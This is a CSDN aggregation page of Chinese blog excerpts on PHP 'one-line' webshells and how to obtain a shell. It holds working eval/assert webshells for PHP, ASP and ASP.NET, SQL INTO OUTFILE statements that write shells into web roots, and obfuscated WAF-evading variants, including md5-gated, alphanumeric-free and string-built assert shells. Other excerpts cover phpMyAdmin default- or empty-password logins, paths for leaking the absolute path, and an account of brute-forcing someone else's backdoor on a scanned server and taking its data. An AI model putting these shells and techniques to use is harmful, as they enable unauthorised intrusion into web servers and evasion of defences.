php 一句话shell_php一句话反弹shell - CSDN
精华内容
参与话题
  • 一句话shellphp

    2019-07-20 08:12:29
    1.mysql执行语句拿shell Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'E:\\phpStudy\\...

    1.mysql执行语句拿shell

    Create TABLE a (cmd text NOT NULL);
    Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
    select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php';

     

     2.利用md5绕过waf

    ---------------------
    本体
    <?php $str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t'; $str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt')); $str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er')); if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ $str4 = strrev($_POST['a']); $str5 = strrev($str4); $str3($str5); } ?>
    ---------------------
    本质
    <?php
    if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
        assert($_POST['a']);
    }
    ?>
    ------------------------
    利用
    .php?a=3fion0hj5965698jhh密码a

    注:default失败!其他编码成功!

     

    3.get_defined_vars()函数马:在过滤$的情况下可使用

    <?php 
    eval(get_defined_vars()['_POST']['1']);
    ?>

     

    4.不含字母数字马

    注:只能菜刀连接!

    <?php
    $_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
    $__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
    $___=$$__;
    $_($___['_']);// assert($_POST['_']);
    ?>

    或者

    <?php
    $_=(urldecode('%01')^'`').(urldecode('%13')^'`').(urldecode('%13')^'`').(urldecode('%05')^'`').(urldecode('%12')^'`').(urldecode('%14')^'`');
    $__='_'.(urldecode('%0D')^']').(urldecode('%2F')^'`').(urldecode('%0E')^']').(urldecode('%09')^']');
    $___=$$__;
    $_($___['_']);// assert($_POST['_']);
    ?>

     

    https://www.freebuf.com/articles/web/173579.html

     https://mochazz.github.io/2017/12/04/bypass1/

     

    转载于:https://www.cnblogs.com/p0pl4r/p/10632441.html

    展开全文
  • 上传一句话木马拿shell教程

    千次阅读 2019-03-21 17:42:49
    一句话木马: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 原理: php的...

    0x00 前言

    一句话木马:

    <?php @eval($_POST['pass']);?>
    
    ASP:    <%eval request("pass")%>
    
    ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

    原理:

    php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 

    0x01 实战

    1. 创建muma.php 然后将<?php @eval($_POST['pass']);?>复制进去
    2. 然后上传到服务器中

    3.上菜刀链接:

    右击添加:

    右击文件管理:

    右击虚拟终端:

     

     

    0x02 遇到的问题

    在下图中,两个必须相同

    展开全文
  • 一句话木马拿shell原理及菜刀的使用

    万次阅读 2018-04-12 21:01:33
    一、一句话木马 原理 1.以PHP举例 php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 比如: &lt;?php $a = 233; $str = "echo $a;"; eval($str); ?&gt; 输出结果:233 ...

    虽然网上这种文章很多了,但自己不总结一遍不踏实。
    一、一句话木马
    原理
    1.以PHP举例
    php的eval()函数:eval($str)函数是把$str当做PHP代码执行。
    比如:
    <?php
    $a = 233;
    $str = "echo $a;";
    eval($str);
    ?>

    输出结果:233
    asp、aspx和php的此函数类似。
    2.一句话木马:
    php:<?php eval($_POST["kxc"]);?>
    asp:<% eval request("kxc") %><%execute(request("kxc"))%>
    asxp:<%@ Page Lanuage="Jscript"%><%eval(Request.Item["kxc"])%>
    3.菜刀拿shell原理:小马上传大马
    菜刀通过kxc(即上述参数)进行http请求,用经过base64编码的php(asp,aspx)代码来执行命令。
    可以参考下面这篇文章,解析的很详细:
    http://www.myhack58.com/Article/html/3/8/2013/40323_6.htm
    数据库模块可参考这篇文章:
    https://www.t00ls.net/articles-28388.html

    二、菜刀的使用
    1.上传好一句话木马。
    2.打开菜刀,点击右键添加:
    这里写图片描述
    3.将一句话木马的url填写,在连接后面text框写一句话木马的参数,在配置里选好语言类型,点击添加。
    这里写图片描述
    4.添加后可以看到有新加的一行,右击选择相应的操作。

    展开全文
  • PHPmyadmin漏洞和拿shell

    万次阅读 2017-04-06 18:32:31
    phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论 ... phpmyadmin2.11.9.2 这个版本存在空口令。...找这个的 用自己的写的脚本,或者搜素引擎什么的,这
    phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论
    phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。
    phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用
    找这个的话 用自己的写的脚本,或者搜素引擎什么的,这里懂的人就懂了,不懂也不在这里。.关于拿shell,----》root权限,并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下,就算你这两个都有,但是服务器的一些配置还是会对这个有影响。
    在getshell之前先进入一个数据库
    第一种,使用sql语句,创建一个表,添加一个字段,字段的内容为一句话,然后导出到php文件中,最后删除这个表,这个是最保险的方法
    Create TABLE 表 (列 text NOT NULL)
    Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
    select 列 from 表 into _utfile '路径'
    Drop TABLE IF EXISTS 表;
    第二种方法,这个是直接写入
    select '一句话'INTO _UTFILE '路径'
    还有几种方法,大致原理都一样。
    然后,一般的话,一句话都是
    <?php @eval($_POST[x])?>
    有狗的话,用免杀一句话,下面这个是我过年前构造的过狗一句话,现在应该还可以过
    <?php
    $a = 's';
    $str = str_repeat($a,2);
    $to = $_POST;
    //echo $str;
    $exp = 'a'.$str[0].$str[1].'e'.'r'.'t';
    $exp($to['x'])
    ?>
    找路径的话,
    1// 利用phpinfo.php
    2//利用phpmyadmin的一些文件报错,下面都是网上通用的
    /phpMyAdmin/index.php?lang[]=1
    /phpMyAdmin/phpinfo.php
    /load_file()
    /phpmyadmin/themes/darkblue_orange/layout.inc.php
    /phpmyadmin/libraries/select_lang.lib.php
    /phpmyadmin/libraries/lect_lang.lib.php
    /phpmyadmin/libraries/mcrypt.lib.php
    /phpmyadmin/libraries/export/xls.php
    3//再者就是利用网站包路径,这些会的都会了,不会的慢慢的就会了。

    下面开始实战,脚本扫到一个IP,显示存在phpmyadmin,打开


    一看这些php文件就是后门一句话,放到几万字典爆破,两秒钟


    直接菜刀链接。。。。。
    这个肯定被人搞了,直接打包好东西,你懂的。。。提权什么的就不必要了。



    展开全文
  • SQL注入写WebShell方式小结

    万次阅读 2018-12-09 11:08:43
    传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union select 1,'&lt;?php eval($_POST[a]);?&gt;' INTO OUTFILE '/var/www/tmp/nb.php'# sqlmap写shell 前提都是需要对目标目录...
  • zabbix 拿shell步骤

    千次阅读 2015-05-09 15:57:05
    测试版本Zabbix 2.2.3 1. 默认用户名密码登录... Admin / zabbix ... ...点右边创建脚本或修改已有脚本 ...写入php一句话 然后点击检测中-最新数据 点击主机选择你刚才创建的命令 点击即可执行 最后在用菜刀连~
  • 如何利用一句话图片木马拿到webshell

    千次阅读 2019-07-29 13:23:26
    <?php fputs(fopen("shell.php","w")),'<?php eval($_POST['shell']);?>' 上传图片木马文件 利用文件包含执行上传文件生成后门 通过菜刀连接webshell
  • ThinkPHP是款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多...
  • 一句话反弹shell

    千次阅读 2017-08-27 17:06:40
    //bash –i打开个交互的bash, /dev/tcp建立个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符: •1.标准输入:代码为0,使用 •2.标准输出:代码...
  • 如何在shell中处理异常

    万次阅读 2015-08-18 10:14:29
    似乎好像大概有句话是这么说得,好程序与坏程序之间的区别就在于它的鲁棒性,也就是在异常情况下该程序是否还是在可hold住状态,能否不死,不崩溃,或者不做出一些超出预期的事情。那要做好这些,自然而然就要学会...
  • 很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸。 这里的疏忽是指,不对用户上传的内容进行检查。...php处理源码: 文本也贴出来: File Upload Source vulner...
  • WEBSHELL姿势之SQL一句话

    千次阅读 2015-10-27 09:16:44
    之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,...1.存在sql注入,在没有字符处理时可直接写入一句话(如Select '' into outfile 'F:/ww
  • 当我们在shell 里运行个脚本程序时,该 shell 就会 fork 出个新进程,从而启动了另个命令解释器(由脚本中第行的 #!/bin/xxx 指定,如 bash shell)来解释运行我们这个脚本。也就是说,这个新进程是...
  • WORDPRESS后台拿WEBSHELL的2个方法

    千次阅读 2011-04-01 14:31:00
    本机建立目录“heimian”,把一句话1.php放进去。打包heimian目录为zip文件。WP后台的主题管理,上传主题,安装。 则你的后门路径为:wp-content/themes/heimian/1.php<br />2.能编辑模板就能拿到shell ...
  • DedeCMS织梦CMS 后台getshell的几种方法

    千次阅读 2018-08-01 16:15:59
    准备工作 1.织梦CMS ... 2.lamp/xamp/wamp环境 3.在本地服务器部署织梦CMS ...5.准备一句话木马文件 新建一个.PHP文件,写入如下语句。 &lt;?php @eval($_POST['cmd']); ?&gt; 方法一...
  • 常用的一句话反弹shell总结

    千次阅读 2019-05-20 15:43:56
    目录 ...4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
  • MySQL 写一句话拿 WebShell

    千次阅读 2018-12-01 20:00:22
    本文介绍两种利用 MySQL getshell 的方法: select … into outfile general_log 、select … into outfile 介绍 利用需要满足以下条件: 对web目录有写权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以...
  • ACCESS执行SQL语句导出一句话拿webshell

    千次阅读 2012-12-21 15:55:52
    但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了 不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。 至于怎么拿到物理...
  • Ecshop后台拿shell方法总结

    千次阅读 2016-11-25 17:17:17
    方法:龙儿心发明的,版本未定,估计都行。 进入后台-系统设置-Flash播放器管理 可以上传任意文件。 [includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接...
  • XCTF攻防世界web新手练习_ 8_webshell

    千次阅读 2019-05-05 12:35:27
    并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀,添加,输入url,输如密码,连接成功, 一气呵成! 菜刀连接成功后可以直接对服务器文件进行操作,看到flag.txt,打开获得flag! ...
1 2 3 4 5 ... 20
收藏数 15,949
精华内容 6,379
关键字:

php 一句话shell